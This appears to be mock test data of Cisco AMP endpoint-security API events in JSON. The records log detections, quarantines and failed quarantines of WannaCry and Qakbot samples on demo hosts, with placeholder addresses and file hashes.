Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
